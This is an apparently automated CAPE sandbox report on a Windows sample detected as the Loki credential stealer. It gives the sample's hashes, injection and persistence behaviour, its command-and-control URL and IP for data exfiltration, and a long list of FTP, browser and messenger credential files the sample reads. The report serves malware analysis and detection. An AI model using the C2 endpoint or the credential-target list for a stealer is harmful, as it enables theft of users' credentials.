CAPE

Detections

Loki


Triggered CAPE Tasks:

Task #25251: Extraction
Task #25252: Injection

Analysis

Category FILE
Package exe
Started 2018-12-04 01:29:53
Completed 2018-12-04 01:33:45
Duration 232 seconds
Options
route = internet
procdump = 1
Log
2018-12-04 01:29:55,000 [root] INFO: Date set to: 12-04-18, time set to: 01:29:55
2018-12-04 01:29:55,015 [root] DEBUG: Starting analyzer from: C:\wikhjvq
2018-12-04 01:29:55,015 [root] DEBUG: Storing results at: C:\waCDpW
2018-12-04 01:29:55,015 [root] DEBUG: Pipe server name: \\.\PIPE\nyAPbWFcLr
2018-12-04 01:29:55,015 [root] DEBUG: No analysis package specified, trying to detect it automagically.
2018-12-04 01:29:55,015 [root] INFO: Automatically selected analysis package "exe"
2018-12-04 01:29:55,312 [root] DEBUG: Started auxiliary module Browser
2018-12-04 01:29:55,312 [root] DEBUG: Started auxiliary module Curtain
2018-12-04 01:29:55,312 [modules.auxiliary.digisig] INFO: Skipping authenticode validation, signtool.exe was not found in bin/
2018-12-04 01:29:55,312 [root] DEBUG: Started auxiliary module DigiSig
2018-12-04 01:29:55,312 [root] DEBUG: Started auxiliary module Disguise
2018-12-04 01:29:55,312 [root] DEBUG: Started auxiliary module Human
2018-12-04 01:29:55,312 [root] DEBUG: Started auxiliary module Screenshots
2018-12-04 01:29:55,312 [root] DEBUG: Started auxiliary module Sysmon
2018-12-04 01:29:55,312 [root] DEBUG: Started auxiliary module Usage
2018-12-04 01:29:55,312 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL option
2018-12-04 01:29:55,312 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL_64 option
2018-12-04 01:29:55,483 [lib.api.process] INFO: Successfully executed process from path "C:\Users\user\AppData\Local\Temp\D1B132.exe" with arguments "" with pid 2912
2018-12-04 01:29:55,483 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2018-12-04 01:29:55,483 [lib.api.process] INFO: 32-bit DLL to inject is C:\wikhjvq\dll\kYJcQFY.dll, loader C:\wikhjvq\bin\iqfNdof.exe
2018-12-04 01:29:55,513 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2912
2018-12-04 01:29:57,526 [lib.api.process] INFO: Successfully resumed process with pid 2912
2018-12-04 01:29:57,526 [root] INFO: Added new process to list with pid: 2912
2018-12-04 01:29:57,542 [root] DEBUG: Terminate processes on terminate_event disabled.
2018-12-04 01:29:57,542 [root] DEBUG: Process dumps enabled.
2018-12-04 01:29:57,619 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 2912 at 0x748a0000, image base 0x400000, stack from 0x186000-0x190000
2018-12-04 01:29:57,619 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Users\user\AppData\Local\Temp\D1B132.exe".
2018-12-04 01:29:57,619 [root] INFO: Monitor successfully loaded in process with pid 2912.
2018-12-04 01:29:58,415 [root] INFO: Disabling sleep skipping.
2018-12-04 01:30:20,365 [root] DEBUG: DLL loaded at 0x74AF0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2018-12-04 01:30:20,395 [root] INFO: Announced 32-bit process name: stickiy.exe pid: 2332
2018-12-04 01:30:20,395 [root] INFO: Added new process to list with pid: 2332
2018-12-04 01:30:20,395 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2018-12-04 01:30:20,395 [lib.api.process] INFO: 32-bit DLL to inject is C:\wikhjvq\dll\kYJcQFY.dll, loader C:\wikhjvq\bin\iqfNdof.exe
2018-12-04 01:30:20,395 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2332
2018-12-04 01:30:20,395 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 2912
2018-12-04 01:30:20,395 [root] DEBUG: GetHookCallerBase: thread 2916 (handle 0x0), return address 0x00374CD0, allocation base 0x00370000.
2018-12-04 01:30:20,395 [root] DEBUG: DumpInterestingRegions: Terminate caller base (0x00370000) different to imagebase (0x00400000) - dumping.
2018-12-04 01:30:20,395 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00370000.
2018-12-04 01:30:20,395 [root] DEBUG: Terminate processes on terminate_event disabled.
2018-12-04 01:30:20,395 [root] DEBUG: Process dumps enabled.
2018-12-04 01:30:20,395 [root] INFO: Disabling sleep skipping.
2018-12-04 01:30:20,411 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 2332 at 0x748a0000, image base 0x400000, stack from 0x186000-0x190000
2018-12-04 01:30:20,411 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Users\user\AppData\Roaming\sticik\stickiy.exe".
2018-12-04 01:30:20,411 [root] INFO: Monitor successfully loaded in process with pid 2332.
2018-12-04 01:30:22,938 [modules.auxiliary.human] INFO: Found button "Close the program", clicking it
2018-12-04 01:30:25,029 [modules.auxiliary.human] INFO: Found button "OK", clicking it
2018-12-04 01:30:26,933 [root] INFO: Process with pid 2912 has terminated
2018-12-04 01:30:43,562 [root] DEBUG: DLL unloaded from 0x00400000.
2018-12-04 01:30:43,562 [root] DEBUG: DLL loaded at 0x74AF0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2018-12-04 01:30:43,562 [root] INFO: Announced 32-bit process name: stickiy.exe pid: 736
2018-12-04 01:30:43,562 [root] INFO: Added new process to list with pid: 736
2018-12-04 01:30:43,562 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2018-12-04 01:30:43,578 [lib.api.process] INFO: 32-bit DLL to inject is C:\wikhjvq\dll\kYJcQFY.dll, loader C:\wikhjvq\bin\iqfNdof.exe
2018-12-04 01:30:43,578 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 736
2018-12-04 01:30:43,608 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 2332
2018-12-04 01:30:43,608 [root] DEBUG: GetHookCallerBase: thread 2380 (handle 0x0), return address 0x003F33DC, allocation base 0x003F0000.
2018-12-04 01:30:43,608 [root] DEBUG: DumpInterestingRegions: Terminate caller base (0x003F0000) different to imagebase (0x00400000) - dumping.
2018-12-04 01:30:43,608 [root] DEBUG: Terminate processes on terminate_event disabled.
2018-12-04 01:30:43,608 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x003F0000.
2018-12-04 01:30:43,608 [root] DEBUG: Process dumps enabled.
2018-12-04 01:30:43,608 [root] INFO: Disabling sleep skipping.
2018-12-04 01:30:43,625 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 736 at 0x748a0000, image base 0x400000, stack from 0x186000-0x190000
2018-12-04 01:30:43,625 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Users\user\AppData\Roaming\sticik\stickiy.exe".
2018-12-04 01:30:43,625 [root] INFO: Monitor successfully loaded in process with pid 736.
2018-12-04 01:30:43,625 [root] DEBUG: DLL loaded at 0x75E70000: C:\Windows\syswow64\SHELL32 (0xc4a000 bytes).
2018-12-04 01:30:43,655 [root] DEBUG: DLL loaded at 0x74C70000: C:\Windows\system32\CRYPTSP (0x16000 bytes).
2018-12-04 01:30:43,655 [root] DEBUG: DLL loaded at 0x74C30000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2018-12-04 01:30:43,812 [root] DEBUG: DLL loaded at 0x73D80000: C:\Windows\system32\vaultcli (0xc000 bytes).
2018-12-04 01:30:43,842 [root] DEBUG: DLL unloaded from 0x75C10000.
2018-12-04 01:30:43,921 [root] INFO: Announced starting service "VaultSvc"
2018-12-04 01:30:43,921 [root] INFO: Attaching to Service Control Manager (services.exe - pid 460)
2018-12-04 01:30:43,951 [lib.api.process] DEBUG: Using CreateRemoteThread injection.
2018-12-04 01:30:43,967 [lib.api.process] INFO: 64-bit DLL to inject is C:\wikhjvq\dll\VQvUBP.dll, loader C:\wikhjvq\bin\hxPAulke.exe
2018-12-04 01:30:43,983 [root] DEBUG: Terminate processes on terminate_event disabled.
2018-12-04 01:30:43,983 [root] DEBUG: Process dumps enabled.
2018-12-04 01:30:44,029 [root] INFO: Disabling sleep skipping.
2018-12-04 01:30:44,062 [root] WARNING: Unable to place hook on LockResource
2018-12-04 01:30:44,062 [root] WARNING: Unable to hook LockResource
2018-12-04 01:30:44,092 [modules.auxiliary.human] INFO: Found button "Close the program", clicking it
2018-12-04 01:30:44,108 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 460 at 0x0000000073CB0000, image base 0x00000000FFA10000, stack from 0x0000000002886000-0x0000000002890000
2018-12-04 01:30:44,124 [root] DEBUG: Commandline: C:\Windows\sysnative\services.exe.
2018-12-04 01:30:44,124 [root] INFO: Added new process to list with pid: 460
2018-12-04 01:30:44,124 [root] INFO: Monitor successfully loaded in process with pid 460.
2018-12-04 01:30:44,982 [root] INFO: Announced 64-bit process name: lsass.exe pid: 1460
2018-12-04 01:30:44,982 [root] INFO: Added new process to list with pid: 1460
2018-12-04 01:30:44,982 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2018-12-04 01:30:44,997 [lib.api.process] INFO: 64-bit DLL to inject is C:\wikhjvq\dll\VQvUBP.dll, loader C:\wikhjvq\bin\hxPAulke.exe
2018-12-04 01:30:45,029 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 1460
2018-12-04 01:30:45,059 [root] DEBUG: Terminate processes on terminate_event disabled.
2018-12-04 01:30:45,059 [root] DEBUG: Process dumps enabled.
2018-12-04 01:30:45,075 [root] INFO: Disabling sleep skipping.
2018-12-04 01:30:45,091 [root] WARNING: Unable to place hook on LockResource
2018-12-04 01:30:45,107 [root] WARNING: Unable to hook LockResource
2018-12-04 01:30:45,107 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 1460 at 0x0000000073CB0000, image base 0x00000000FF1A0000, stack from 0x00000000000E4000-0x00000000000F0000
2018-12-04 01:30:45,107 [root] DEBUG: Commandline: C:\Windows\sysnative\lsass.exe.
2018-12-04 01:30:45,107 [root] INFO: Monitor successfully loaded in process with pid 1460.
2018-12-04 01:30:46,183 [modules.auxiliary.human] INFO: Found button "OK", clicking it
2018-12-04 01:30:47,213 [root] INFO: Process with pid 2332 has terminated
2018-12-04 01:31:15,089 [root] INFO: Notified of termination of process with pid 1460.
2018-12-04 01:31:15,417 [root] DEBUG: DLL loaded at 0x74A90000: C:\Windows\system32\profapi (0xb000 bytes).
2018-12-04 01:31:15,808 [root] INFO: Process with pid 1460 has terminated
2018-12-04 01:31:16,276 [root] DEBUG: DLL loaded at 0x74A60000: C:\Windows\system32\SAMCLI (0xf000 bytes).
2018-12-04 01:31:16,290 [root] DEBUG: DLL loaded at 0x74A50000: C:\Windows\system32\WKSCLI (0xf000 bytes).
2018-12-04 01:31:16,290 [root] DEBUG: DLL loaded at 0x74A70000: C:\Windows\system32\NETAPI32 (0x11000 bytes).
2018-12-04 01:31:16,306 [root] DEBUG: DLL loaded at 0x74A40000: C:\Windows\system32\netutils (0x9000 bytes).
2018-12-04 01:31:16,322 [root] DEBUG: DLL loaded at 0x74A20000: C:\Windows\system32\srvcli (0x19000 bytes).
2018-12-04 01:31:16,338 [root] DEBUG: DLL loaded at 0x74A00000: C:\Windows\system32\SAMLIB (0x12000 bytes).
2018-12-04 01:31:16,368 [root] DEBUG: DLL loaded at 0x74850000: C:\Windows\system32\USERENV (0x17000 bytes).
2018-12-04 01:31:16,400 [root] DEBUG: DLL loaded at 0x75790000: C:\Windows\syswow64\CRYPT32 (0x11d000 bytes).
2018-12-04 01:31:16,400 [root] DEBUG: DLL loaded at 0x755F0000: C:\Windows\syswow64\MSASN1 (0xc000 bytes).
2018-12-04 01:31:16,431 [root] DEBUG: DLL loaded at 0x74BF0000: C:\Windows\System32\mswsock (0x3c000 bytes).
2018-12-04 01:31:16,447 [root] DEBUG: DLL loaded at 0x74B50000: C:\Windows\system32\DNSAPI (0x44000 bytes).
2018-12-04 01:31:16,463 [root] DEBUG: DLL loaded at 0x74830000: C:\Windows\system32\IPHLPAPI (0x1c000 bytes).
2018-12-04 01:31:16,477 [root] DEBUG: DLL loaded at 0x74960000: C:\Windows\system32\WINNSI (0x7000 bytes).
2018-12-04 01:31:16,711 [root] DEBUG: DLL loaded at 0x747F0000: C:\Windows\System32\fwpuclnt (0x38000 bytes).
2018-12-04 01:31:16,775 [root] DEBUG: DLL loaded at 0x747E0000: C:\Windows\system32\rasadhlp (0x6000 bytes).
2018-12-04 01:31:16,789 [root] DEBUG: DLL loaded at 0x747D0000: C:\Windows\System32\wship6 (0x6000 bytes).
2018-12-04 01:31:18,849 [root] DEBUG: DLL loaded at 0x74BE0000: C:\Windows\System32\wshtcpip (0x5000 bytes).
2018-12-04 01:33:29,655 [root] INFO: Analysis timeout hit, terminating analysis.
2018-12-04 01:33:29,655 [root] INFO: Created shutdown mutex.
2018-12-04 01:33:30,670 [root] INFO: Setting terminate event for process 736.
2018-12-04 01:33:30,670 [root] DEBUG: Terminate Event: Attempting to dump process 736
2018-12-04 01:33:30,670 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00400000.
2018-12-04 01:33:30,670 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00400000.
2018-12-04 01:33:30,670 [root] DEBUG: DumpProcess: Module entry point VA is 0x000139DE.
2018-12-04 01:33:30,684 [root] INFO: Added new CAPE file to list with path: C:\waCDpW\CAPE\736_20650930063033142122018
2018-12-04 01:33:30,684 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x9e000.
2018-12-04 01:33:31,184 [root] INFO: Shutting down package.
2018-12-04 01:33:31,184 [root] INFO: Stopping auxiliary modules.
2018-12-04 01:33:31,184 [root] INFO: Finishing auxiliary modules.
2018-12-04 01:33:31,184 [root] INFO: Shutting down pipe server and dumping dropped files.
2018-12-04 01:33:31,184 [root] INFO: Analysis completed.

MalScore

10.0

Malicious

Machine

Name target-01
Label target-01
Manager ESX
Started On 2018-12-04 01:29:54
Shutdown On 2018-12-04 01:33:45

File Details

File Name D1B132.exe
File Size 853504 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 518281e0a10098565f6a635ec103bfb2
SHA1 3757e2735ec4cedc2dcfc02a93b6e7eaa46c8356
SHA256 b8b6ee5387befd762ecce0e146bd0a6465239fa0785869f05fa58bdd25335d3e
SHA512 0ba8717834089091835393d963f153eb6828c8f355a440dc4bfed7b64ac1ddd34e5934b205946187796101dfcd14c1dd300a52c4e5052f2fe8b8b3498f5cfa3b
CRC32 42A578A1
Ssdeep 12288:aLNt0GIWI1BrDqqdlb0Z8qL8C0oCH67dOY7XGwJ4UNG3HuYAWEVULNio:ap2u+rw826SdT7XGwJ4UTcEVULUo
TrID
  • 35.5% (.EXE) Win32 Executable Delphi generic (14182/79/4)
  • 32.8% (.SCR) Windows screen saver (13101/52/3)
  • 11.2% (.EXE) Win32 Executable (generic) (4508/7/1)
  • 5.1% (.EXE) Win16/32 Executable Delphi generic (2072/23)
  • 5.0% (.EXE) OS/2 Executable (generic) (2029/13)
ClamAV None matched
Yara None matched
CAPE Yara None matched

Signatures

Behavioural detection: Executable code extraction
Yara rule detections observed from a process memory dump/dropped files/CAPE
Hit: PID 736 triggered the Yara rule 'HeavensGate'
Hit: PID 736 triggered the Yara rule 'Loki'
Creates RWX memory
A process attempted to delay the analysis task.
Process: stickiy.exe tried to sleep 741 seconds, actually delayed analysis time by 0 seconds
Dynamic (imported) function loading detected
DynamicLoader: kernel32.dll/GetDiskFreeSpaceExA
DynamicLoader: oleaut32.dll/VariantChangeTypeEx
DynamicLoader: oleaut32.dll/VarNeg
DynamicLoader: oleaut32.dll/VarNot
DynamicLoader: oleaut32.dll/VarAdd
DynamicLoader: oleaut32.dll/VarSub
DynamicLoader: oleaut32.dll/VarMul
DynamicLoader: oleaut32.dll/VarDiv
DynamicLoader: oleaut32.dll/VarIdiv
DynamicLoader: oleaut32.dll/VarMod
DynamicLoader: oleaut32.dll/VarAnd
DynamicLoader: oleaut32.dll/VarOr
DynamicLoader: oleaut32.dll/VarXor
DynamicLoader: oleaut32.dll/VarCmp
DynamicLoader: oleaut32.dll/VarI4FromStr
DynamicLoader: oleaut32.dll/VarR4FromStr
DynamicLoader: oleaut32.dll/VarR8FromStr
DynamicLoader: oleaut32.dll/VarDateFromStr
DynamicLoader: oleaut32.dll/VarCyFromStr
DynamicLoader: oleaut32.dll/VarBoolFromStr
DynamicLoader: oleaut32.dll/VarBstrFromCy
DynamicLoader: oleaut32.dll/VarBstrFromDate
DynamicLoader: oleaut32.dll/VarBstrFromBool
DynamicLoader: user32.dll/GetMonitorInfoA
DynamicLoader: user32.dll/GetSystemMetrics
DynamicLoader: user32.dll/EnumDisplayMonitors
DynamicLoader: user32.dll/AnimateWindow
DynamicLoader: comctl32.dll/InitializeFlatSB
DynamicLoader: comctl32.dll/UninitializeFlatSB
DynamicLoader: comctl32.dll/FlatSB_GetScrollProp
DynamicLoader: comctl32.dll/FlatSB_SetScrollProp
DynamicLoader: comctl32.dll/FlatSB_EnableScrollBar
DynamicLoader: comctl32.dll/FlatSB_ShowScrollBar
DynamicLoader: comctl32.dll/FlatSB_GetScrollRange
DynamicLoader: comctl32.dll/FlatSB_GetScrollInfo
DynamicLoader: comctl32.dll/FlatSB_GetScrollPos
DynamicLoader: comctl32.dll/FlatSB_SetScrollPos
DynamicLoader: comctl32.dll/FlatSB_SetScrollInfo
DynamicLoader: comctl32.dll/FlatSB_SetScrollRange
DynamicLoader: user32.dll/SetLayeredWindowAttributes
DynamicLoader: stickiy.exe/drfHLq2P0PBsf1fnYpfqu
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptCreateHash
DynamicLoader: CRYPTSP.dll/CryptHashData
DynamicLoader: CRYPTSP.dll/CryptGetHashParam
DynamicLoader: CRYPTSP.dll/CryptDestroyHash
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: vaultcli.dll/VaultEnumerateItems
DynamicLoader: vaultcli.dll/VaultEnumerateVaults
DynamicLoader: vaultcli.dll/VaultFree
DynamicLoader: vaultcli.dll/VaultGetItem
DynamicLoader: vaultcli.dll/VaultOpenVault
DynamicLoader: vaultcli.dll/VaultCloseVault
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: NETAPI32.DLL/NetUserGetInfo
DynamicLoader: CRYPTSP.dll/CryptImportKey
DynamicLoader: CRYPTSP.dll/CryptSetKeyParam
DynamicLoader: CRYPTSP.dll/CryptDecrypt
DynamicLoader: CRYPTSP.dll/CryptDestroyKey
DynamicLoader: NETAPI32.DLL/NetUserGetInfo
DynamicLoader: NETAPI32.DLL/NetUserGetInfo
Drops a binary and executes it
binary: C:\Users\user\AppData\Roaming\sticik\stickiy.exe
HTTP traffic contains suspicious features which may be indicative of malware related traffic
post_no_referer: HTTP traffic contains a POST request with no referer header
http_version_old: HTTP traffic uses version 1.0
suspicious_request: http://decvit.ga/and/cat.php
Performs some HTTP requests
url: http://decvit.ga/and/cat.php
The binary likely contains encrypted or compressed data.
section: name: .rsrc, entropy: 6.95, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ, raw_size: 0x00032a00, virtual_size: 0x000329bc
Behavioural detection: Injection (Process Hollowing)
Injection: stickiy.exe(2332) -> stickiy.exe(736)
Executed a process and injected code into it, probably while unpacking
Injection: stickiy.exe(2332) -> stickiy.exe(736)
Behavioural detection: Injection (inter-process)
Installs itself for autorun at Windows startup
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sticik.vbs
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sticik.vbs
Creates a hidden or system file
file: C:\Users\user\AppData\Roaming\24CFE6\6F2024.exe
file: C:\Users\user\AppData\Roaming\24CFE6
Creates a copy of itself
copy: C:\Users\user\AppData\Roaming\sticik\stickiy.exe
copy: C:\Users\user\AppData\Roaming\24CFE6\6F2024.exe
Harvests credentials from local FTP client software
file: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml
file: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
file: C:\Users\user\AppData\Roaming\Far Manager\Profile\PluginsData\42E4AEB1-A230-44F4-B33C-F195BB654931.db
file: C:\Program Files (x86)\FTPGetter\Profile\servers.xml
file: C:\Users\user\AppData\Roaming\FTPGetter\servers.xml
file: C:\Users\user\AppData\Roaming\Estsoft\ALFTP\ESTdb2.dat
key: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
key: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
key: HKEY_CURRENT_USER\Software\Ghisler\Total Commander
key: HKEY_CURRENT_USER\Software\LinasFTP\Site Manager
Harvests information related to installed instant messenger clients
file: C:\Users\user\AppData\Roaming\.purple\accounts.xml
Harvests information related to installed mail clients
Attempts to interact with an Alternate Data Stream (ADS)
file: C:\Users\user\AppData\Roaming\sticik\stickiy.exe:ZoneIdentifier
Collects information to fingerprint the system
Anomalous binary characteristics
anomaly: Timestamp on binary predates the release date of the OS version it requires by at least a year

Hosts

Direct IP Country Name
Y 8.8.8.8 United States
N 199.192.27.109 United States

DNS

Name Response
decvit.ga A 199.192.27.109

C:\Users\user\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\User Data\Default\Login Data
C:\Users\user\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\User Data\Default\Web Data
C:\Users\user\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\Login Data
C:\Users\user\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\Default\Login Data
C:\Users\user\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\User Data\Default\Login Data
C:\Users\user\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\User Data\Default\Web Data
C:\Users\user\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\Login Data
C:\Users\user\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\Default\Login Data
C:\Users\user\AppData\Local\QupZilla\profiles\default\browsedata.db
C:\Users\user\AppData\Roaming\Opera
C:\Users\user\AppData\Roaming\.purple\accounts.xml
C:\Users\user\Documents\SuperPutty
C:\Program Files (x86)\FTPShell\ftpshell.fsi
C:\Users\user\AppData\Roaming\Notepad++\plugins\config\NppFTP\NppFTP.xml
C:\Program Files (x86)\oZone3D\MyFTP\myftp.ini
C:\Users\user\AppData\Roaming\FTPBox\profiles.conf
C:\Program Files (x86)\Sherrod Computers\sherrod FTP\favorites
C:\Program Files (x86)\FTP Now\sites.xml
C:\Program Files (x86)\NexusFile\userdata\ftpsite.ini
C:\Users\user\AppData\Roaming\NexusFile\ftpsite.ini
C:\Users\user\Documents\NetSarang\Xftp\Sessions
C:\Users\user\AppData\Roaming\NetSarang\Xftp\Sessions
C:\Program Files (x86)\EasyFTP\data
C:\Users\user\AppData\Roaming\SftpNetDrive
C:\Program Files (x86)\AbleFTP7\encPwd.jsd
C:\Program Files (x86)\AbleFTP7\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP7\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP8\encPwd.jsd
C:\Program Files (x86)\AbleFTP8\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP8\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP9\encPwd.jsd
C:\Program Files (x86)\AbleFTP9\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP9\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP10\encPwd.jsd
C:\Program Files (x86)\AbleFTP10\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP10\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP11\encPwd.jsd
C:\Program Files (x86)\AbleFTP11\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP11\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP12\encPwd.jsd
C:\Program Files (x86)\AbleFTP12\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP12\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP13\encPwd.jsd
C:\Program Files (x86)\AbleFTP13\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP13\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP14\encPwd.jsd
C:\Program Files (x86)\AbleFTP14\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP14\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp7\encPwd.jsd
C:\Program Files (x86)\JaSFtp7\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp7\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp8\encPwd.jsd
C:\Program Files (x86)\JaSFtp8\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp8\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp9\encPwd.jsd
C:\Program Files (x86)\JaSFtp9\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp9\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp10\encPwd.jsd
C:\Program Files (x86)\JaSFtp10\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp10\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp11\encPwd.jsd
C:\Program Files (x86)\JaSFtp11\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp11\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp12\encPwd.jsd
C:\Program Files (x86)\JaSFtp12\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp12\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp13\encPwd.jsd
C:\Program Files (x86)\JaSFtp13\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp13\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp14\encPwd.jsd
C:\Program Files (x86)\JaSFtp14\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp14\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize7\encPwd.jsd
C:\Program Files (x86)\Automize7\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize7\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize8\encPwd.jsd
C:\Program Files (x86)\Automize8\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize8\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize9\encPwd.jsd
C:\Program Files (x86)\Automize9\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize9\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize10\encPwd.jsd
C:\Program Files (x86)\Automize10\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize10\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize11\encPwd.jsd
C:\Program Files (x86)\Automize11\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize11\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize12\encPwd.jsd
C:\Program Files (x86)\Automize12\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize12\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize13\encPwd.jsd
C:\Program Files (x86)\Automize13\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize13\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize14\encPwd.jsd
C:\Program Files (x86)\Automize14\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize14\data\settings\ftpProfiles-j.jsd
C:\Users\user\AppData\Roaming\Cyberduck
C:\Users\user\AppData\Roaming\iterate_GmbH
C:\Users\user\.config\fullsync\profiles.xml
C:\Users\user\AppData\Roaming\FTPInfo\ServerList.xml
C:\Users\user\AppData\Roaming\FTPInfo\ServerList.cfg
C:\Program Files (x86)\FileZilla\Filezilla.xml
C:\Users\user\AppData\Roaming\FileZilla\filezilla.xml
C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml
C:\Program Files (x86)\Staff-FTP\sites.ini
C:\Users\user\AppData\Roaming\BlazeFtp\site.dat
C:\Program Files (x86)\Fastream NETFile\My FTP Links
C:\Program Files (x86)\GoFTP\settings\Connections.txt
C:\Users\user\AppData\Roaming\Estsoft\ALFTP\ESTdb2.dat
C:\Program Files (x86)\DeluxeFTP\sites.xml
C:\Windows\wcx_ftp.ini
C:\Users\user\AppData\Roaming\wcx_ftp.ini
C:\Users\user\wcx_ftp.ini
C:\Users\user\AppData\Roaming\GHISLER\wcx_ftp.ini
C:\Program Files (x86)\FTPGetter\Profile\servers.xml
C:\Users\user\AppData\Roaming\FTPGetter\servers.xml
C:\Program Files (x86)\WS_FTP\WS_FTP.INI
C:\Windows\WS_FTP.INI
C:\Users\user\AppData\Roaming\Ipswitch
C:\Users\user\site.xml
C:\Users\user\AppData\Local\PokerStars*
C:\Users\user\AppData\Local\ExpanDrive
C:\Users\user\AppData\Roaming\Steed\bookmarks.txt
C:\Users\user\AppData\Roaming\FlashFXP
C:\ProgramData\FlashFXP
C:\Users\user\AppData\Local\INSoftware\NovaFTP\NovaFTP.db
C:\Users\user\AppData\Roaming\NetDrive\NDSites.ini
C:\Users\user\AppData\Roaming\NetDrive2\drives.dat
C:\ProgramData\NetDrive2\drives.dat
C:\Users\user\AppData\Roaming\SmartFTP
